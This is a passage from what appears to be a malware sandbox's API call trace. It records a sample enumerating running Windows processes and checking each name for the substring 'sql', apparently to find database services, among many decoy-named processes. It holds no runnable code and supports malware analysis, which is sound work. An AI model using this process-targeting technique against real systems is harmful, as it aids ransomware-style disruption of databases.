hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x84c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0113.800] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SecurityHealthService.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0113.800] LocalAlloc (uFlags=0x40, uBytes=0x1a) returned 0x357eb68 [0113.800] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SecurityHealthService.exe", cchWideChar=-1, lpMultiByteStr=0x357eb68, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SecurityHealthService.exe", lpUsedDefaultChar=0x0) returned 26 [0113.801] lstrcpyA (in: lpString1=0x567fabc, lpString2="SecurityHealthService.exe" | out: lpString1="SecurityHealthService.exe") returned="SecurityHealthService.exe" [0113.801] StrStrIA (lpFirst="SecurityHealthService.exe", lpSrch="sql") returned 0x0 [0113.801] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0113.802] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="Memory Compression", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0113.802] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x357fbc0 [0113.802] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="Memory Compression", cchWideChar=-1, lpMultiByteStr=0x357fbc0, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Memory Compression", lpUsedDefaultChar=0x0) returned 19 [0113.802] lstrcpyA (in: lpString1=0x567fabc, lpString2="Memory Compression" | out: lpString1="Memory Compression") returned="Memory Compression" [0113.802] StrStrIA (lpFirst="Memory Compression", lpSrch="sql") returned 0x0 [0113.802] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb3c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0113.804] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0113.804] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x357f940 [0113.804] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=-1, lpMultiByteStr=0x357f940, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 24 [0113.804] lstrcpyA (in: lpString1=0x567fabc, lpString2="ShellExperienceHost.exe" | out: lpString1="ShellExperienceHost.exe") returned="ShellExperienceHost.exe" [0113.804] StrStrIA (lpFirst="ShellExperienceHost.exe", lpSrch="sql") returned 0x0 [0113.804] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0113.805] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SearchUI.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0113.805] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3570ae8 [0113.805] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SearchUI.exe", cchWideChar=-1, lpMultiByteStr=0x3570ae8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 13 [0113.806] lstrcpyA (in: lpString1=0x567fabc, lpString2="SearchUI.exe" | out: lpString1="SearchUI.exe") returned="SearchUI.exe" [0113.806] StrStrIA (lpFirst="SearchUI.exe", lpSrch="sql") returned 0x0 [0113.806] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0113.808] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="RuntimeBroker.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0113.808] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x357f960 [0113.809] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="RuntimeBroker.exe", cchWideChar=-1, lpMultiByteStr=0x357f960, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 18 [0113.809] lstrcpyA (in: lpString1=0x567fabc, lpString2="RuntimeBroker.exe" | out: lpString1="RuntimeBroker.exe") returned="RuntimeBroker.exe" [0113.809] StrStrIA (lpFirst="RuntimeBroker.exe", lpSrch="sql") returned 0x0 [0113.809] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0113.810] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0113.810] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3570b18 [0113.810] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x3570b18, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 13 [0113.810] lstrcpyA (in: lpString1=0x567fabc, lpString2="WmiPrvSE.exe" | out: lpString1="WmiPrvSE.exe") returned="WmiPrvSE.exe" [0113.810] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="sql") returned 0x0 [0113.810] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="pending.exe")) returned 1 [0113.812] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pending.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0113.812] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3570fe0 [0113.812] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pending.exe", cchWideChar=-1, lpMultiByteStr=0x3570fe0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pending.exe", lpUsedDefaultChar=0x0) returned 12 [0113.812] lstrcpyA (in: lpString1=0x567fabc, lpString2="pending.exe" | out: lpString1="pending.exe") returned="pending.exe" [0113.812] StrStrIA (lpFirst="pending.exe", lpSrch="sql") returned 0x0 [0113.812] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="appointmentimpressed.exe")) returned 1 [0113.813] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="appointmentimpressed.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0113.813] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x357eac8 [0113.813] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="appointmentimpressed.exe", cchWideChar=-1, lpMultiByteStr=0x357eac8, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="appointmentimpressed.exe", lpUsedDefaultChar=0x0) returned 25 [0113.813] lstrcpyA (in: lpString1=0x567fabc, lpString2="appointmentimpressed.exe" | out: lpString1="appointmentimpressed.exe") returned="appointmentimpressed.exe" [0113.813] StrStrIA (lpFirst="appointmentimpressed.exe", lpSrch="sql") returned 0x0 [0113.813] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="swing prefer.exe")) returned 1 [0113.815] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="swing prefer.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0113.815] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x357fc60 [0113.815] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="swing prefer.exe", cchWideChar=-1, lpMultiByteStr=0x357fc60, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="swing prefer.exe", lpUsedDefaultChar=0x0) returned 17 [0113.815] lstrcpyA (in: lpString1=0x567fabc, lpString2="swing prefer.exe" | out: lpString1="swing prefer.exe") returned="swing prefer.exe" [0113.815] StrStrIA (lpFirst="swing prefer.exe", lpSrch="sql") returned 0x0 [0113.815] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="vietnamese_mature_hat.exe")) returned 1 [0113.817] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="vietnamese_mature_hat.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0113.817] LocalAlloc (uFlags=0x40, uBytes=0x1a) returned 0x357ec30 [0113.817] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="vietnamese_mature_hat.exe", cchWideChar=-1, lpMultiByteStr=0x357ec30, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vietnamese_mature_hat.exe", lpUsedDefaultChar=0x0) returned 26 [0113.817] lstrcpyA (in: lpString1=0x567fabc, lpString2="vietnamese_mature_hat.exe" | out: lpString1="vietnamese_mature_hat.exe") returned="vietnamese_mature_hat.exe" [0113.817] StrStrIA (lpFirst="vietnamese_mature_hat.exe", lpSrch="sql") returned 0x0 [0113.818] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="nights-attending.exe")) returned 1 [0113.819] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="nights-attending.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0113.819] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x357f980 [0113.819] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="nights-attending.exe", cchWideChar=-1, lpMultiByteStr=0x357f980, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nights-attending.exe", lpUsedDefaultChar=0x0) returned 21 [0113.819] lstrcpyA (in: lpString1=0x567fabc, lpString2="nights-attending.exe" | out: lpString1="nights-attending.exe") returned="nights-attending.exe" [0113.819] StrStrIA (lpFirst="nights-attending.exe", lpSrch="sql") returned 0x0 [0113.819] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x51c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="installed.exe")) returned 1 [0113.820] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="installed.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0113.820] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3570fc8 [0113.821] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="installed.exe", cchWideChar=-1, lpMultiByteStr=0x3570fc8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="installed.exe", lpUsedDefaultChar=0x0) returned 14 [0113.821] lstrcpyA (in: lpString1=0x567fabc, lpString2="installed.exe" | out: lpString1="installed.exe") returned="installed.exe" [0113.821] StrStrIA (lpFirst="installed.exe", lpSrch="sql") returned 0x0 [0113.821] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x794, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="references compounds.exe")) returned 1 [0113.822] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="references compounds.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0113.822] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x357ea50 [0113.822] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="references compounds.exe", cchWideChar=-1, lpMultiByteStr=0x357ea50, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="references compounds.exe", lpUsedDefaultChar=0x0) returned 25 [0113.822] lstrcpyA (in: lpString1=0x567fabc, lpString2="references compounds.exe" | out: lpString1="references compounds.exe") returned="references compounds.exe" [0113.822] StrStrIA (lpFirst="references compounds.exe", lpSrch="sql") returned 0x0 [0113.822] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="albuquerque_left.exe")) returned 1 [0113.824] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="albuquerque_left.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0113.824] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x357f9c0 [0113.824] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="albuquerque_left.exe", cchWideChar=-1, lpMultiByteStr=0x357f9c0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="albuquerque_left.exe", lpUsedDefaultChar=0x0) returned 21 [0113.824] lstrcpyA (in: lpString1=0x567fabc, lpString2="albuquerque_left.exe" | out: lpString1="albuquerque_left.exe") returned="albuquerque_left.exe" [0113.824] StrStrIA (lpFirst="albuquerque_left.exe", lpSrch="sql") returned 0x0 [0113.824] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="registered try.exe")) returned 1 [0113.825] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="registered try.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0113.825] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x357f9e0 [0113.825] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="registered try.exe", cchWideChar=-1, lpMultiByteStr=0x357f9e0, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="registered try.exe", lpUsedDefaultChar=0x0) returned 19 [0113.825] lstrcpyA (in: lpString1=0x567fabc, lpString2="registered try.exe" | out: lpString1="registered try.exe") returned="registered try.exe" [0113.825] StrStrIA (lpFirst="registered try.exe", lpSrch="sql") returned 0x0 [0113.825] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="consultancy statute ide.exe")) returned 1 [0113.827] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="consultancy statute ide.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0113.827] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x357eaa0 [0113.827] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="consultancy statute ide.exe", cchWideChar=-1, lpMultiByteStr=0x357eaa0, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="consultancy statute ide.exe", lpUsedDefaultChar=0x0) returned 28 [0113.827] lstrcpyA (in: lpString1=0x567fabc, lpString2="consultancy statute ide.exe" | out: lpString1="consultancy statute ide.exe") returned="consultancy statute ide.exe" [0113.827] StrStrIA (lpFirst="consultancy statute ide.exe", lpSrch="sql") returned 0x0 [0113.827] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x67c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="invite.exe")) returned 1 [0113.829] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="invite.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0113.829] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3570ff8 [0113.829] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="invite.exe", cchWideChar=-1, lpMultiByteStr=0x3570ff8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="invite.exe", lpUsedDefaultChar=0x0) returned 11 [0113.829] lstrcpyA (in: lpString1=0x567fabc, lpString2="invite.exe" | out: lpString1="invite.exe") returned="invite.exe" [0113.829] StrStrIA (lpFirst="invite.exe", lpSrch="sql") returned 0x0 [0113.829] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="idol.exe")) returned 1 [0113.830] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="idol.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0113.830] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3571010 [0113.830] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="idol.exe", cchWideChar=-1, lpMultiByteStr=0x3571010, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="idol.exe", lpUsedDefaultChar=0x0) returned 9 [0113.830] lstrcpyA (in: lpString1=0x567fabc, lpString2="idol.exe" | out: lpString1="idol.exe") returned="idol.exe" [0113.830] StrStrIA (lpFirst="idol.exe", lpSrch="sql") returned 0x0 [0113.830] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="latitude qualifications.exe")) returned 1 [0114.006] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="latitude qualifications.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0114.006] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x357eb40 [0114.006] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="latitude qualifications.exe", cchWideChar=-1, lpMultiByteStr=0x357eb40, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="latitude qualifications.exe", lpUsedDefaultChar=0x0) returned 28 [0114.006] lstrcpyA (in: lpString1=0x567fabc, lpString2="latitude qualifications.exe" | out: lpString1="latitude qualifications.exe") returned="latitude qualifications.exe" [0114.006] StrStrIA (lpFirst="latitude qualifications.exe", lpSrch="sql") returned 0x0 [0114.006] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="lauderdaletransmittedwasher.exe")) returned 1 [0114.008] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lauderdaletransmittedwasher.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0114.008] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x357eb90 [0114.008] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lauderdaletransmittedwasher.exe", cchWideChar=-1, lpMultiByteStr=0x357eb90, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lauderdaletransmittedwasher.exe", lpUsedDefaultChar=0x0) returned 32 [0114.008] lstrcpyA (in: lpString1=0x567fabc, lpString2="lauderdaletransmittedwasher.exe" | out: lpString1="lauderdaletransmittedwasher.exe") returned="lauderdaletransmittedwasher.exe" [0114.008] StrStrIA (lpFirst="lauderdaletransmittedwasher.exe", lpSrch="sql") returned 0x0 [0114.008] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="powell_jane.exe")) returned 1 [0114.009] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="powell_jane.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0114.009] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x3571028 [0114.009] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="powell_jane.exe", cchWideChar=-1, lpMultiByteStr=0x3571028, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="powell_jane.exe", lpUsedDefaultChar=0x0) returned 16 [0114.009] lstrcpyA (in: lpString1=0x567fabc, lpString2="powell_jane.exe" | out: lpString1="powell_jane.exe") returned="powell_jane.exe" [0114.009] StrStrIA (lpFirst="powell_jane.exe", lpSrch="sql") returned 0x0 [0114.010] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="laboratorysaving.exe")) returned 1 [0114.011] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="laboratorysaving.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0114.011] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x357fb80 [0114.011] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="laboratorysaving.exe", cchWideChar=-1, lpMultiByteStr=0x357fb80, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="laboratorysaving.exe", lpUsedDefaultChar=0x0) returned 21 [0114.011] lstrcpyA (in: lpString1=0x567fabc, lpString2="laboratorysaving.exe" | out: lpString1="laboratorysaving.exe") returned="laboratorysaving.exe" [0114.011] StrStrIA (lpFirst="laboratorysaving.exe", lpSrch="sql") returned 0x0 [0114.011] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x798, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="gainedshape.exe")) returned 1 [0114.012] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gainedshape.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0114.012] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x3571070 [0114.012] WideCharToMultiByte (in: CodePage=0x0, 